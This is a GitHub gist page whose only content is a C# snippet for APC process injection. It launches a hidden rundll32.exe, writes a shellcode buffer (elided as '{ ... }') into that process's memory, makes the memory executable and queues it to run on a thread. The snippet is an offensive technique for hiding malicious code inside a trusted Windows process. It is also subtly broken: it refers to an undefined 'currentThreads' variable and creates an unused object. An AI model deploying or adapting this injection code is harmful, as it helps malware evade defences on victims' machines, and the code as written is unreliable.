-
-
Save djhohnstein/0a876cd83abaab6bb956b7a48178b1eb to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
static void Main(string[] args) { | |
byte[] sc = { ... }; | |
string processpath = @"C:\Windows\system32\rundll32.exe"; | |
STARTUPINFO si = new STARTUPINFO(); | |
PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); | |
bool success = CreateProcess(processpath, null, | |
IntPtr.Zero, IntPtr.Zero, false, | |
ProcessCreationFlags.CREATE_NO_WINDOW, | |
IntPtr.Zero, null, ref si, out pi); | |
IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, sc.Length, MEM_COMMIT, PAGE_READWRITE); | |
IntPtr bytesWritten = IntPtr.Zero; | |
bool resultBool = WriteProcessMemory(pi.hProcess, resultPtr, sc, sc.Length, out bytesWritten); | |
Process targetProc = Process.GetProcessById((int)pi.dwProcessId); | |
IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, currentThreads[0].Id); | |
uint oldProtect = 0; | |
resultBool = VirtualProtectEx(pi.hProcess, resultPtr, sc.Length, PAGE_EXECUTE_READ, out oldProtect); | |
IntPtr ptr = QueueUserAPC(resultPtr, sht, IntPtr.Zero); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment